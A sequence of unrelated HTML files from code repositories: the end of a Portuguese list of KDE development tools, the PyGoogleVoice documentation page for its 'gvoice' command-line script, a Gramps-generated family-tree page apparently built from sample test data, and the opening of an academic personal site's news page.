<tr valign=top>
<td class=even><a HREF="http://cervisia.sourceforge.net/">Cervisia</a></td>
<td class=even>um <i>frontend</i> gráfico para cvs com boa integração no KDE</td>
</tr>
<tr valign=top>
<td class=odd><a HREF="http://www.lincvs.org/">LinCVS</a></td>
<td class=odd>um <i>frontend</i> gráfico para cvs</td>
</tr>
<tr valign=top>
<td class=even><a HREF="http://www.gnu.org/software/ddd/">DDD</a></td>
<td class=even>um <i>debugger</i> com apresentação gráfica de dados</td>
</tr>
<tr valign=top>
<td class=odd><a HREF="http://uml.sourceforge.net/">Umbrello</a></td>
<td class=odd>uma ferramenta de modelação UML</td>
</tr>
<tr valign=top>
<td class=even><a HREF="http://kprof.sourceforge.net/">KProf</a></td>
<td class=even>uma ferramenta visual de análise e optimização de desempenho (<i>profiling</i>) para KDE</td>
</tr>
</table>
<?php module_tail(); ?>
|
doc/scripts.html
|
jluellen/pygooglevoice
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Command Line Script — PyGoogleVoice v0.5 documentation</title>
<link rel="stylesheet" href="_static/default.css" type="text/css" />
<link rel="stylesheet" href="_static/pygments.css" type="text/css" />
<script type="text/javascript">
var DOCUMENTATION_OPTIONS = {
URL_ROOT: '',
VERSION: '0.5',
COLLAPSE_MODINDEX: false,
FILE_SUFFIX: '.html',
HAS_SOURCE: true
};
</script>
<script type="text/javascript" src="_static/jquery.js"></script>
<script type="text/javascript" src="_static/doctools.js"></script>
<link rel="top" title="PyGoogleVoice v0.5 documentation" href="index.html" />
<link rel="next" title="Examples" href="examples.html" />
<link rel="prev" title="Configuration" href="config.html" />
</head>
<body>
<div class="related">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
accesskey="I">index</a></li>
<li class="right" >
<a href="modindex.html" title="Global Module Index"
accesskey="M">modules</a> |</li>
<li class="right" >
<a href="examples.html" title="Examples"
accesskey="N">next</a> |</li>
<li class="right" >
<a href="config.html" title="Configuration"
accesskey="P">previous</a> |</li>
<li><a href="index.html">PyGoogleVoice v0.5 documentation</a> »</li>
</ul>
</div>
<div class="document">
<div class="documentwrapper">
<div class="bodywrapper">
<div class="body">
<div class="section" id="command-line-script">
<span id="scripts"></span><h1>Command Line Script<a class="headerlink" href="#command-line-script" title="Permalink to this headline">¶</a></h1>
<p>The module also comes with a script called <tt class="docutils literal"><span class="pre">gvoice</span></tt> which can do all the wonderful stuff that the
Python module can do easily on the command line.</p>
<div class="section" id="usage">
<h2>Usage<a class="headerlink" href="#usage" title="Permalink to this headline">¶</a></h2>
<div class="highlight-python"><pre>Usage: gvoice [options] commands
Where commands are
login (li) - log into the voice service
logout (lo) - log out of the service and make sure session is deleted
help
Voice Commands
call (c) - call an outgoing number from a forwarding number
cancel (cc) - cancel a particular call
download (d) - download mp3 message given id hash
send_sms (s) - send sms messages
Folder Views
search (se)
inbox (i)
voicemail (v)
starred (st)
all (a)
spam (sp)
trash (t)
voicemail (v)
sms (sm)
recorded (r)
placed (p)
recieved (re)
missed (m)
Options:
-h, --help show this help message and exit
-e EMAIL, --email=EMAIL
Google Voice Account Email
-p PASSWD, --password=PASSWD
Your account password (prompted if blank)
-b, --batch Batch operations, asking for no interactive input</pre>
</div>
</div>
<div class="section" id="example">
<h2>Example<a class="headerlink" href="#example" title="Permalink to this headline">¶</a></h2>
<div class="highlight-python"><pre>$ gvoice -e myusername@gmail.com
Password:
gvoice> call
Outgoing number: 18004664411
Forwarding number: 14075551234
Calling...</pre>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="sphinxsidebar">
<div class="sphinxsidebarwrapper">
<h3><a href="index.html">Table Of Contents</a></h3>
<ul>
<li><a class="reference external" href="">Command Line Script</a><ul>
<li><a class="reference external" href="#usage">Usage</a></li>
<li><a class="reference external" href="#example">Example</a></li>
</ul>
</li>
</ul>
<h4>Previous topic</h4>
<p class="topless"><a href="config.html"
title="previous chapter">Configuration</a></p>
<h4>Next topic</h4>
<p class="topless"><a href="examples.html"
title="next chapter">Examples</a></p>
<h3>This Page</h3>
<ul class="this-page-menu">
<li><a href="_sources/scripts.txt"
rel="nofollow">Show Source</a></li>
</ul>
<div id="searchbox" style="display: none">
<h3>Quick search</h3>
<form class="search" action="search.html" method="get">
<input type="text" name="q" size="18" />
<input type="submit" value="Go" />
<input type="hidden" name="check_keywords" value="yes" />
<input type="hidden" name="area" value="default" />
</form>
<p class="searchtip" style="font-size: 90%">
Enter search terms or a module, class or function name.
</p>
</div>
<script type="text/javascript">$('#searchbox').show(0);</script>
</div>
</div>
<div class="clearer"></div>
</div>
<div class="related">
<h3>Navigation</h3>
<ul>
<li class="right" style="margin-right: 10px">
<a href="genindex.html" title="General Index"
>index</a></li>
<li class="right" >
<a href="modindex.html" title="Global Module Index"
>modules</a> |</li>
<li class="right" >
<a href="examples.html" title="Examples"
>next</a> |</li>
<li class="right" >
<a href="config.html" title="Configuration"
>previous</a> |</li>
<li><a href="index.html">PyGoogleVoice v0.5 documentation</a> »</li>
</ul>
</div>
<div class="footer">
© Copyright 2009, Justin Quick <justquick@gmail.com>.
Created using <a href="http://sphinx.pocoo.org/">Sphinx</a> 0.6.3.
</div>
</body>
</html>
|
gramps42/gramps/example_NAVWEB0/ppl/9/k/SMWJQCXQ6I2GEXSPK9.html
|
belissent/testing-example-reports
|
<!DOCTYPE html>
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-US">
<title>My Family Tree - Garner, Eugene Stanley, Jr.</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mobile-web-app-capable" content="yes" />
<meta name="generator" content="Gramps 4.2.2 http://gramps-project.org/" />
<meta name="author" content="" />
<link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" />
<link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" />
<link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" />
<link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="header">
<h1 id="SiteTitle">My Family Tree</h1>
</div>
<div class="wrapper" id="nav" role="navigation">
<div class="container">
<ul class="menu" id="dropmenu">
<li class = "CurrentSection"><a href="../../../individuals.html" title="Individuals">Individuals</a></li>
<li><a href="../../../index.html" title="Surnames">Surnames</a></li>
<li><a href="../../../places.html" title="Places">Places</a></li>
<li><a href="../../../sources.html" title="Sources">Sources</a></li>
<li><a href="../../../media.html" title="Media">Media</a></li>
<li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li>
</ul>
</div>
</div>
<div class="content" id="IndividualDetail">
<h3>Garner, Eugene Stanley, Jr.<sup><small> <a href="#sref1">1</a></small></sup></h3>
<div id="summaryarea">
<table class="infolist">
<tr>
<td class="ColumnAttribute">Birth Name</td>
<td class="ColumnValue">
Garner, Eugene Stanley, Jr.
</td>
</tr>
<tr>
<td class="ColumnAttribute">Gramps ID</td>
<td class="ColumnValue">I0135</td>
</tr>
<tr>
<td class="ColumnAttribute">Gender</td>
<td class="ColumnValue">male</td>
</tr>
</table>
</div>
<div class="subsection" id="events">
<h4>Events</h4>
<table class="infolist eventlist">
<thead>
<tr>
<th class="ColumnEvent">Event</th>
<th class="ColumnDate">Date</th>
<th class="ColumnPlace">Place</th>
<th class="ColumnDescription">Description</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnEvent">
Birth
</td>
<td class="ColumnDate"> </td>
<td class="ColumnPlace">
<a href="../../../plc/p/5/3NWJQC4O6BBSH10D5P.html" title="Vernon, Wilbarger, TX, USA">
Vernon, Wilbarger, TX, USA
</a>
</td>
<td class="ColumnDescription">
Birth of Garner, Eugene Stanley, Jr.
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
<tr>
<td class="ColumnEvent">
LVG
</td>
<td class="ColumnDate"> </td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Custom FTW5 tag to specify LIVING not specified in GEDCOM 5.5
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
</tbody>
</table>
</div>
<div class="subsection" id="parents">
<h4>Parents</h4>
<table class="infolist">
<thead>
<tr>
<th class="ColumnAttribute">Relation to main person</th>
<th class="ColumnValue">Name</th>
<th class="ColumnValue">Relation within this family (if not by birth)</th>
</tr>
</thead>
<tbody>
</tbody>
<tr>
<td class="ColumnAttribute">Father</td>
<td class="ColumnValue">
<a href="../../../ppl/v/j/DPUJQCUYKKDPT78JJV.html">Garner, Eugene Stanley<span class="grampsid"> [I0046]</span></a>
</td>
</tr>
<tr>
<td class="ColumnAttribute">Mother</td>
<td class="ColumnValue">
<a href="../../../ppl/a/3/1WUJQCHNH76G6YD3A.html">Reed, Frances Lucille (Babe)<span class="grampsid"> [I0053]</span></a>
</td>
</tr>
<tr>
<td class="ColumnAttribute"> Brother</td>
<td class="ColumnValue"> <a href="../../../ppl/3/n/TDTJQCGYRS2RCCGQN3.html">Garner, Howard Lane<span class="grampsid"> [I0010]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue"> <a href="../../../ppl/9/k/SMWJQCXQ6I2GEXSPK9.html">Garner, Eugene Stanley, Jr.<span class="grampsid"> [I0135]</span></a></td>
<td class="ColumnValue"></td>
</tr>
<tr>
<td class="ColumnAttribute"> Brother</td>
<td class="ColumnValue"> <a href="../../../ppl/9/u/GNWJQC9NLVF2MZLHU9.html">Garner, John Roger<span class="grampsid"> [I0136]</span></a></td>
<td class="ColumnValue"></td>
</tr>
</table>
</div>
<div class="subsection" id="families">
<h4>Families</h4>
<table class="infolist fixed_subtables">
<tr class="BeginFamily">
<td class="ColumnType"> </td>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue"><a href="" title="Family of Garner, Eugene Stanley, Jr. and Pelletier, Josephine">Family of Garner, Eugene Stanley, Jr. and Pelletier, Josephine<span class="grampsid"> [F0031]</span></a></td>
</tr>
<tr class="BeginFamily">
<td class="ColumnType">Married</td>
<td class="ColumnAttribute">Wife</td>
<td class="ColumnValue">
<a href="../../../ppl/t/7/J9XJQC7HIKP3GC3A7T.html">Pelletier, Josephine<span class="grampsid"> [I0174]</span></a>
</td>
</tr>
<tr>
<td class="ColumnType"> </td>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue">
<table class="infolist eventlist">
<thead>
<tr>
<th class="ColumnEvent">Event</th>
<th class="ColumnDate">Date</th>
<th class="ColumnPlace">Place</th>
<th class="ColumnDescription">Description</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnEvent">
Marriage
</td>
<td class="ColumnDate"> </td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Marriage of Garner, Eugene Stanley, Jr. and Pelletier, Josephine
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
</tbody>
</table>
</td>
<tr>
<td class="ColumnType"> </td>
<td class="ColumnAttribute">Children</td>
<td class="ColumnValue">
<ol>
<li>
<a href="../../../ppl/a/j/UAXJQC6HC354V7Q6JA.html">Garner, Francis William<span class="grampsid"> [I0176]</span></a>
</li>
<li>
<a href="../../../ppl/9/8/DBXJQCJCEZMO17WZ89.html">Garner, Richard Eugene<span class="grampsid"> [I0177]</span></a>
</li>
<li>
<a href="../../../ppl/n/r/XBXJQCS4QY316ZGHRN.html">Garner, Michael Stanley<span class="grampsid"> [I0178]</span></a>
</li>
<li>
<a href="../../../ppl/7/0/HCXJQCRKB4K65V1C07.html">Garner, Barbara Jo<span class="grampsid"> [I0179]</span></a>
</li>
<li>
<a href="../../../ppl/o/u/0DXJQC1T8P3CQKZIUO.html">Garner, Kathryn Mary<span class="grampsid"> [I0180]</span></a>
</li>
<li>
<a href="../../../ppl/a/q/JDXJQCR5L0NTR21SQA.html">Garner, Peter George<span class="grampsid"> [I0181]</span></a>
</li>
<li>
<a href="../../../ppl/h/6/3EXJQCVWOSQFGLYB6H.html">Garner, Bernadette<span class="grampsid"> [I0182]</span></a>
</li>
<li>
<a href="../../../ppl/s/i/OEXJQCQJHF2BLSAAIS.html">Garner, Louella Marie<span class="grampsid"> [I0183]</span></a>
</li>
<li>
<a href="../../../ppl/s/o/BFXJQCF1JBOXPRW2OS.html">Garner, Cecilia<span class="grampsid"> [I0184]</span></a>
</li>
<li>
<a href="../../../ppl/p/r/ZFXJQCHAD8SLZZ7KRP.html">Garner, Mark Gerard<span class="grampsid"> [I0185]</span></a>
</li>
<li>
<a href="../../../ppl/t/7/KGXJQCBQ39ON9VB37T.html">Garner, John Joseph<span class="grampsid"> [I0186]</span></a>
</li>
<li>
<a href="../../../ppl/8/b/0HEKQCLINMQS4RB7B8.html">Garner, Margaret Ann<span class="grampsid"> [I1039]</span></a>
</li>
</ol>
</td>
</tr>
</tr>
<tr class="BeginFamily">
<td class="ColumnType"> </td>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue"><a href="" title="Family of Garner, Eugene Stanley, Jr. and Washington, Pearline">Family of Garner, Eugene Stanley, Jr. and Washington, Pearline<span class="grampsid"> [F0376]</span></a></td>
</tr>
<tr class="BeginFamily">
<td class="ColumnType">Married</td>
<td class="ColumnAttribute">Wife</td>
<td class="ColumnValue">
<a href="../../../ppl/r/1/S7GKQCNHZHO3ELPX1R.html">Washington, Pearline<span class="grampsid"> [I1140]</span></a>
</td>
</tr>
<tr>
<td class="ColumnType"> </td>
<td class="ColumnAttribute"> </td>
<td class="ColumnValue">
<table class="infolist eventlist">
<thead>
<tr>
<th class="ColumnEvent">Event</th>
<th class="ColumnDate">Date</th>
<th class="ColumnPlace">Place</th>
<th class="ColumnDescription">Description</th>
<th class="ColumnNotes">Notes</th>
<th class="ColumnSources">Sources</th>
</tr>
</thead>
<tbody>
<tr>
<td class="ColumnEvent">
Marriage
</td>
<td class="ColumnDate"> </td>
<td class="ColumnPlace"> </td>
<td class="ColumnDescription">
Marriage of Garner, Eugene Stanley, Jr. and Washington, Pearline
</td>
<td class="ColumnNotes">
<div>
</div>
</td>
<td class="ColumnSources">
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</table>
</div>
<div class="subsection" id="pedigree">
<h4>Pedigree</h4>
<ol class="pedigreegen">
<li>
<a href="../../../ppl/v/j/DPUJQCUYKKDPT78JJV.html">Garner, Eugene Stanley<span class="grampsid"> [I0046]</span></a>
<ol>
<li class="spouse">
<a href="../../../ppl/a/3/1WUJQCHNH76G6YD3A.html">Reed, Frances Lucille (Babe)<span class="grampsid"> [I0053]</span></a>
<ol>
<li>
<a href="../../../ppl/3/n/TDTJQCGYRS2RCCGQN3.html">Garner, Howard Lane<span class="grampsid"> [I0010]</span></a>
</li>
<li class="thisperson">
Garner, Eugene Stanley, Jr.
<ol class="spouselist">
<li class="spouse">
<a href="../../../ppl/t/7/J9XJQC7HIKP3GC3A7T.html">Pelletier, Josephine<span class="grampsid"> [I0174]</span></a>
<ol>
<li>
<a href="../../../ppl/a/j/UAXJQC6HC354V7Q6JA.html">Garner, Francis William<span class="grampsid"> [I0176]</span></a>
</li>
<li>
<a href="../../../ppl/9/8/DBXJQCJCEZMO17WZ89.html">Garner, Richard Eugene<span class="grampsid"> [I0177]</span></a>
</li>
<li>
<a href="../../../ppl/n/r/XBXJQCS4QY316ZGHRN.html">Garner, Michael Stanley<span class="grampsid"> [I0178]</span></a>
</li>
<li>
<a href="../../../ppl/7/0/HCXJQCRKB4K65V1C07.html">Garner, Barbara Jo<span class="grampsid"> [I0179]</span></a>
</li>
<li>
<a href="../../../ppl/o/u/0DXJQC1T8P3CQKZIUO.html">Garner, Kathryn Mary<span class="grampsid"> [I0180]</span></a>
</li>
<li>
<a href="../../../ppl/a/q/JDXJQCR5L0NTR21SQA.html">Garner, Peter George<span class="grampsid"> [I0181]</span></a>
</li>
<li>
<a href="../../../ppl/h/6/3EXJQCVWOSQFGLYB6H.html">Garner, Bernadette<span class="grampsid"> [I0182]</span></a>
</li>
<li>
<a href="../../../ppl/s/i/OEXJQCQJHF2BLSAAIS.html">Garner, Louella Marie<span class="grampsid"> [I0183]</span></a>
</li>
<li>
<a href="../../../ppl/s/o/BFXJQCF1JBOXPRW2OS.html">Garner, Cecilia<span class="grampsid"> [I0184]</span></a>
</li>
<li>
<a href="../../../ppl/p/r/ZFXJQCHAD8SLZZ7KRP.html">Garner, Mark Gerard<span class="grampsid"> [I0185]</span></a>
</li>
<li>
<a href="../../../ppl/t/7/KGXJQCBQ39ON9VB37T.html">Garner, John Joseph<span class="grampsid"> [I0186]</span></a>
</li>
<li>
<a href="../../../ppl/8/b/0HEKQCLINMQS4RB7B8.html">Garner, Margaret Ann<span class="grampsid"> [I1039]</span></a>
</li>
</ol>
</li>
<li class="spouse">
<a href="../../../ppl/r/1/S7GKQCNHZHO3ELPX1R.html">Washington, Pearline<span class="grampsid"> [I1140]</span></a>
</li>
</ol>
</li>
<li>
<a href="../../../ppl/9/u/GNWJQC9NLVF2MZLHU9.html">Garner, John Roger<span class="grampsid"> [I0136]</span></a>
</li>
</ol>
</li>
</ol>
</li>
</ol>
</div>
<div class="subsection" id="tree">
<h4>Ancestors</h4>
<div id="treeContainer" style="width:735px; height:602px;">
<div class="boxbg male AncCol0" style="top: 269px; left: 6px;">
<a class="noThumb" href="../../../ppl/9/k/SMWJQCXQ6I2GEXSPK9.html">
Garner, Eugene Stanley, Jr.
</a>
</div>
<div class="shadow" style="top: 274px; left: 10px;"></div>
<div class="bvline" style="top: 301px; left: 165px; width: 15px"></div>
<div class="gvline" style="top: 306px; left: 165px; width: 20px"></div>
<div class="boxbg male AncCol1" style="top: 119px; left: 196px;">
<a href="../../../ppl/v/j/DPUJQCUYKKDPT78JJV.html">
<span class="thumbnail">
<img alt="Image: Garner, Eugene Stanley" src="../../../thumb/e/h/78V2GQX2FKNSYQ3OHE.png" />
</span>
Garner, Eugene Stanley
</a>
</div>
<div class="shadow" style="top: 124px; left: 200px;"></div>
<div class="bvline" style="top: 151px; left: 180px; width: 15px;"></div>
<div class="gvline" style="top: 156px; left: 185px; width: 20px;"></div>
<div class="bhline" style="top: 151px; left: 180px; height: 150px;"></div>
<div class="gvline" style="top: 156px; left: 185px; height: 150px;"></div>
<div class="bvline" style="top: 151px; left: 355px; width: 15px"></div>
<div class="gvline" style="top: 156px; left: 355px; width: 20px"></div>
<div class="boxbg male AncCol2" style="top: 44px; left: 386px;">
<a href="../../../ppl/h/o/GNUJQCL9MD64AM56OH.html">
<span class="thumbnail">
<img alt="Image: Garner von Zieliński, Lewis Anderson Sr" src="../../../thumb/m/z/B1AUFQV7H8R9NR4SZM.png" />
</span>
Garner von Zieliński, Lewis Anderson Sr
</a>
</div>
<div class="shadow" style="top: 49px; left: 390px;"></div>
<div class="bvline" style="top: 76px; left: 370px; width: 15px;"></div>
<div class="gvline" style="top: 81px; left: 375px; width: 20px;"></div>
<div class="bhline" style="top: 76px; left: 370px; height: 75px;"></div>
<div class="gvline" style="top: 81px; left: 375px; height: 75px;"></div>
<div class="bvline" style="top: 76px; left: 545px; width: 15px"></div>
<div class="gvline" style="top: 81px; left: 545px; width: 20px"></div>
<div class="boxbg male AncCol3" style="top: 7px; left: 576px;">
<a class="noThumb" href="../../../ppl/v/l/35WJQC1B7T7NPV8OLV.html">
Garner, Robert W.
</a>
</div>
<div class="shadow" style="top: 12px; left: 580px;"></div>
<div class="bvline" style="top: 39px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 44px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 39px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 44px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol3" style="top: 81px; left: 576px;">
<a class="noThumb" href="../../../ppl/c/c/46WJQCIOLQ0KOX2XCC.html">
Zieliński, Phoebe Emily
</a>
</div>
<div class="shadow" style="top: 86px; left: 580px;"></div>
<div class="bvline" style="top: 113px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 118px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 76px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 81px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol2" style="top: 194px; left: 386px;">
<a href="../../../ppl/i/0/FOUJQC7PMC15VC4P0I.html">
<span class="thumbnail">
<img alt="Image: Martel, Luella Jacques" src="../../../thumb/h/d/Y3ARGQWE088EQRTTDH.png" />
</span>
Martel, Luella Jacques
</a>
</div>
<div class="shadow" style="top: 199px; left: 390px;"></div>
<div class="bvline" style="top: 226px; left: 370px; width: 15px;"></div>
<div class="gvline" style="top: 231px; left: 375px; width: 20px;"></div>
<div class="bhline" style="top: 151px; left: 370px; height: 75px;"></div>
<div class="gvline" style="top: 156px; left: 375px; height: 75px;"></div>
<div class="bvline" style="top: 226px; left: 545px; width: 15px"></div>
<div class="gvline" style="top: 231px; left: 545px; width: 20px"></div>
<div class="boxbg male AncCol3" style="top: 157px; left: 576px;">
<a class="noThumb" href="../../../ppl/j/7/N4DKQCPEMZ7OO62O7J.html">
Martel, Henry
</a>
</div>
<div class="shadow" style="top: 162px; left: 580px;"></div>
<div class="bvline" style="top: 189px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 194px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 189px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 194px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol3" style="top: 231px; left: 576px;">
<a class="noThumb" href="../../../ppl/2/2/O5DKQC8EQ25LDQ0D22.html">
Hébert, Ruth Ann
</a>
</div>
<div class="shadow" style="top: 236px; left: 580px;"></div>
<div class="bvline" style="top: 263px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 268px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 226px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 231px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol1" style="top: 419px; left: 196px;">
<a class="noThumb" href="../../../ppl/a/3/1WUJQCHNH76G6YD3A.html">
Reed, Frances Lucille (Babe)
</a>
</div>
<div class="shadow" style="top: 424px; left: 200px;"></div>
<div class="bvline" style="top: 451px; left: 180px; width: 15px;"></div>
<div class="gvline" style="top: 456px; left: 185px; width: 20px;"></div>
<div class="bhline" style="top: 301px; left: 180px; height: 150px;"></div>
<div class="gvline" style="top: 306px; left: 185px; height: 150px;"></div>
<div class="bvline" style="top: 451px; left: 355px; width: 15px"></div>
<div class="gvline" style="top: 456px; left: 355px; width: 20px"></div>
<div class="boxbg male AncCol2" style="top: 344px; left: 386px;">
<a class="noThumb" href="../../../ppl/r/c/9QUJQCCSWRZNSAPCR.html">
Reed, Francis Vincent
</a>
</div>
<div class="shadow" style="top: 349px; left: 390px;"></div>
<div class="bvline" style="top: 376px; left: 370px; width: 15px;"></div>
<div class="gvline" style="top: 381px; left: 375px; width: 20px;"></div>
<div class="bhline" style="top: 376px; left: 370px; height: 75px;"></div>
<div class="gvline" style="top: 381px; left: 375px; height: 75px;"></div>
<div class="bvline" style="top: 376px; left: 545px; width: 15px"></div>
<div class="gvline" style="top: 381px; left: 545px; width: 20px"></div>
<div class="boxbg male AncCol3" style="top: 307px; left: 576px;">
<a class="noThumb" href="../../../ppl/5/a/9PVJQCLLCJI6KC6A5.html">
Reed, John
</a>
</div>
<div class="shadow" style="top: 312px; left: 580px;"></div>
<div class="bvline" style="top: 339px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 344px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 339px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 344px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol3" style="top: 381px; left: 576px;">
<a class="noThumb" href="../../../ppl/b/e/6QVJQCD1E6Z7C67YEB.html">
Goodwin, Sarah
</a>
</div>
<div class="shadow" style="top: 386px; left: 580px;"></div>
<div class="bvline" style="top: 413px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 418px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 376px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 381px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol2" style="top: 494px; left: 386px;">
<a class="noThumb" href="../../../ppl/5/a/9RUJQCBU39EKP1CRA5.html">
Тихонов, Catherine Virginia
</a>
</div>
<div class="shadow" style="top: 499px; left: 390px;"></div>
<div class="bvline" style="top: 526px; left: 370px; width: 15px;"></div>
<div class="gvline" style="top: 531px; left: 375px; width: 20px;"></div>
<div class="bhline" style="top: 451px; left: 370px; height: 75px;"></div>
<div class="gvline" style="top: 456px; left: 375px; height: 75px;"></div>
<div class="bvline" style="top: 526px; left: 545px; width: 15px"></div>
<div class="gvline" style="top: 531px; left: 545px; width: 20px"></div>
<div class="boxbg male AncCol3" style="top: 457px; left: 576px;">
<a class="noThumb" href="../../../ppl/j/l/ZQVJQCTEOBIDQBVCLJ.html">
Тихонов, Moses
</a>
</div>
<div class="shadow" style="top: 462px; left: 580px;"></div>
<div class="bvline" style="top: 489px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 494px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 489px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 494px; left: 565px; height: 37px;"></div>
<div class="boxbg female AncCol3" style="top: 531px; left: 576px;">
<a class="noThumb" href="../../../ppl/w/t/YRVJQCW19QU583G3TW.html">
Holt, Bridget
</a>
</div>
<div class="shadow" style="top: 536px; left: 580px;"></div>
<div class="bvline" style="top: 563px; left: 560px; width: 15px;"></div>
<div class="gvline" style="top: 568px; left: 565px; width: 20px;"></div>
<div class="bhline" style="top: 526px; left: 560px; height: 37px;"></div>
<div class="gvline" style="top: 531px; left: 565px; height: 37px;"></div>
</div>
</div>
<div class="subsection" id="sourcerefs">
<h4>Source References</h4>
<ol>
<li>
<a href="../../../src/x/a/X5TJQC9JXU4RKT6VAX.html" title="Import from test2.ged" name ="sref1">
Import from test2.ged
<span class="grampsid"> [S0003]</span>
</a>
</li>
</ol>
</div>
</div>
<div class="fullclear"></div>
<div id="footer">
<p id="createdate">
Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.2 on 2015-12-25<br />Last change was the 2007-07-26 08:34:25
</p>
<p id="copyright">
</p>
</div>
</body>
</html>
|
news/announcement_11/index.html
|
andreamad8/andreamad8.github.io
|
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Andrea Madotto | Announcement_11</title>
<meta name="description" content="A simple, whitespace theme for academics. Based on [*folio](https://github.com/bogoli/-folio) design.
">
<!-- Open Graph -->
<meta property="og:site_name" content="A simple, whitespace theme for academics. Based on [*folio](https://github.com/bogoli/-folio) design.
" />
<meta property="og:type" content="object" />
<meta property="og:title" content="" />
<meta property="og:url" content="/news/announcement_11/" />
<meta property="og:description" content="Announcement_11" />
<meta property="og:image" content="" />
<!-- Bootstrap & MDB -->
<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet" integrity="sha512-MoRNloxbStBcD8z3M/2BmnT+rg4IsMxPkXaGh2zD6LGNNFE80W3onsAhRcMAMrSoyWL9xD7Ert0men7vR8LUZg==" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/mdbootstrap/4.19.1/css/mdb.min.css" integrity="sha512-RO38pBRxYH3SoOprtPTD86JFOclM51/XTIdEPh5j8sj4tp8jmQIx26twG52UaLi//hQldfrh7e51WzP9wuP32Q==" crossorigin="anonymous" />
<!-- Fonts & Icons -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.14.0/css/all.min.css" integrity="sha512-1PKOgIY59xJ8Co8+NE6FZ+LOAZKjy+KY8iq0G4B3CyeY6wYHN3yt9PW0XpSriVlkMXe40PTKnXrLnZ9+fkDaog==" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/academicons/1.9.0/css/academicons.min.css" integrity="sha512-W4yqoT1+8NLkinBLBZko+dFB2ZbHsYLDdr50VElllRcNt2Q4/GSs6u71UHKxB7S6JEMCp5Ve4xjh3eGQl/HRvg==" crossorigin="anonymous">
<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Roboto+Slab:100,300,400,500,700|Material+Icons">
<!-- Code Syntax Highlighting -->
<link rel="stylesheet" href="https://gitcdn.link/repo/jwarby/jekyll-pygments-themes/master/github.css" />
<!-- Styles -->
<link rel="shortcut icon" href="/assets/img/favicon.ico">
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="canonical" href="/news/announcement_11/">
<!-- Theming-->
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-80604868-2"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'UA-80604868-2');
</script>
<!-- MathJax -->
